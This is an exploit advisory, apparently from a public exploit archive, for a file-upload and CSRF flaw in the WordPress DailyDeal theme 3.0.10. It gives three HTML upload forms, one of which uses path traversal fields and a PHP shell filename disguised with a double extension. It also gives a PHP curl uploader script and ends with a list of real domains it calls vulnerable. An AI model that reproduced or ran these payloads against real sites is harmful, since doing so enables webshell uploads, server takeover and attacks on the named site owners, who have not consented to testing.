#################################################################### # Exploit Title : WordPress DailyDeal Themes 3.0 CSRF Shell Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 19/03/2020 # Vendor Homepage : templatic.com # Sofware Link : themesinfo.com/?search_type=folder&search=DailyDeal # Software Affected Version : 3.0.10 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ] CWE-264 [ Permissions, Privileges, and Access Controls ] CWE-434 [ Unrestricted Upload of File with Dangerous Type ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Impact : *********** WordPress DailyDeal Themes is prone to a vulnerability that lets attackers upload arbitrary files because it fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. CWE-352: Cross-Site Request Forgery (CSRF) ****************************************** The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution. CWE-264: Permissions, Privileges, and Access Controls ************************************************** Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. CWE-434: Unrestricted Upload of File with Dangerous Type **************************************************** The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. #################################################################### # Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit : *************************************************************** /wp-content/themes/DailyDeal/monetize/upload/ /wp-content/themes/DailyDeal/monetize/upload/index.php /wp-content/themes/DailyDeal/library/includes/upload.php CSRF Cross Site Request Forgery Exploiter 1 => ****************************************** <form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/themes/DailyDeal/library/includes/upload.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form> # CSRF Cross Site Request Forgery Exploit 2 => **************************************** <title>WordPress DailyDeal Themes Exploiter</title> <form action="http://[VULNERABLEWEBSITE]/wp-content/themes/DailyDeal/library/includes/upload.php" method="post" enctype="multipart/form-data"> <body background=" "> <input type="file" name="file" id="file"><br> <input name="form_id" value="../../../" type=hidden"> <input name="name" value="kingskrupellos.php.pjpg" type=''hidden"> <input name="gform_unique_id" value="../../" type="hidden"> <input name="field_id" value="" type="hidden"> <input type="submit" name="gform_submit" value="submit"> # CSRF Cross Site Request Forgery Exploit 3=> **************************************** <html> <body> <form action="http://www.[VULNERABLESITE].gov/wp-content/themes/DailyDeal/library/includes/upload.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="WordPress DailyDeal Themes Exploiter Cyberizm" /> <input type="hidden" name="album_desc" value="WordPress DailyDeal Themes Exploiter Cyberizm" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html> </form> PHP Exploiter Code : ********************* <?php $uploadfile="kingskrupellos.php.pjpg"; /// KingSkrupellos ! Cyberizm Digital Security Army ^_^ $ch = curl_init("http://127.0.0.1/wp-content/themes/DailyDeal/library/includes/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('file'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> # Vulnerability Error : ******************** ERROR:invalid upload #################################################################### # Example Vulnerable Sites : ************************ [+] millionportals.com/wp-content/themes/DailyDeal/library/includes/upload.php [+] descuento.site/wp-content/themes/DailyDeal/library/includes/upload.php [+] aka.dotd.sale/wp-content/themes/DailyDeal/library/includes/upload.php [+] monsterlasvegasdeals.com/wp-content/themes/DailyDeal/library/includes/upload.php [+] bizlistedeals.com/wp-content/themes/DailyDeal/library/includes/upload.php [+] yasuiii.com/wp-content/themes/DailyDeal/library/includes/upload.php [+] oneitemdeals.com/wp-content/themes/DailyDeal/library/includes/upload.php [+] bigdailydeals.co.uk/wp-content/themes/DailyDeal/monetize/upload/index.php #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################